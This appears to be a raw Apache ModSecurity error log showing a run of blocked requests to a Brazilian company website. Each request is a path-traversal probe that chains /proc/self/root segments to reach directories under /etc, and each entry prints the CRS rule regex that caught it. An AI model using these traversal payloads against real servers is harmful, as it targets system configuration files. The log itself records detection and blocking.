[Tue Mar 17 08:31:39.466758 2026] [:error] [pid 11293:tid 140411574073088] [client 74.7.241.46:41840] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7m9CmCSWTlPouqorD5wAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:39.571306 2026] [:error] [pid 11469:tid 140411741927168] [client 74.7.243.203:58508] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7m5DEJR9VXonE_-1GmAAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:31:40.636998 2026] [:error] [pid 1961:tid 140411616036608] [client 74.7.241.46:41848] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7nHRXaaWotPICgYsdrwAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:41.936128 2026] [:error] [pid 7000:tid 140411649607424] [client 74.7.241.46:41850] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7nRePVOt35XCGZP8n2QAAA4s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:43.443047 2026] [:error] [pid 11469:tid 140411582465792] [client 74.7.241.46:41854] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7n5DEJR9VXonE_-1GmgAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:45.762002 2026] [:error] [pid 11469:tid 140411624429312] [client 74.7.241.46:41870] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7oZDEJR9VXonE_-1GmwAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:47.939456 2026] [:error] [pid 11293:tid 140411741927168] [client 74.7.243.203:59854] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7otCmCSWTlPouqorD7gAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:31:47.940672 2026] [:error] [pid 11469:tid 140411607643904] [client 74.7.241.46:41880] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7o5DEJR9VXonE_-1GnAAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:49.256448 2026] [:error] [pid 11293:tid 140411540502272] [client 74.7.241.46:44016] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7pdCmCSWTlPouqorD7wAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:50.396061 2026] [:error] [pid 11469:tid 140411691570944] [client 74.7.241.46:44018] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7ppDEJR9VXonE_-1GnwAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:51.495782 2026] [:error] [pid 11469:tid 140411708356352] [client 74.7.243.203:59870] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7p5DEJR9VXonE_-1GogAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:31:51.707581 2026] [:error] [pid 1016:tid 140411641214720] [client 74.7.241.46:44022] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7p5qmL8PQht4WJFlBHgAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:53.438823 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.241.46:44030] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7qKBJNF7axNlVR0X1bQAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:54.744555 2026] [:error] [pid 2305:tid 140411557287680] [client 74.7.241.46:44038] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7qgQohV2v-7oj5HHzbwAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:56.056740 2026] [:error] [pid 1016:tid 140411741927168] [client 74.7.241.46:44046] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7rJqmL8PQht4WJFlBIAAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:57.394571 2026] [:error] [pid 2305:tid 140411540502272] [client 74.7.241.46:44060] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7rQQohV2v-7oj5HHzcAAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:58.115942 2026] [:error] [pid 11469:tid 140411582465792] [client 74.7.243.203:39766] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7rpDEJR9VXonE_-1GpwAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:31:58.676573 2026] [:error] [pid 1961:tid 140411674785536] [client 74.7.241.46:47076] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7rnRXaaWotPICgYsdsAAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:31:59.998789 2026] [:error] [pid 7000:tid 140411540502272] [client 74.7.241.46:47084] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7rxePVOt35XCGZP8n3gAAA5g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:01.332134 2026] [:error] [pid 2305:tid 140411733534464] [client 74.7.241.46:47088] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7sQQohV2v-7oj5HHzdQAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:02.823787 2026] [:error] [pid 7000:tid 140411616036608] [client 74.7.241.46:47104] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7shePVOt35XCGZP8n3wAAA48"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
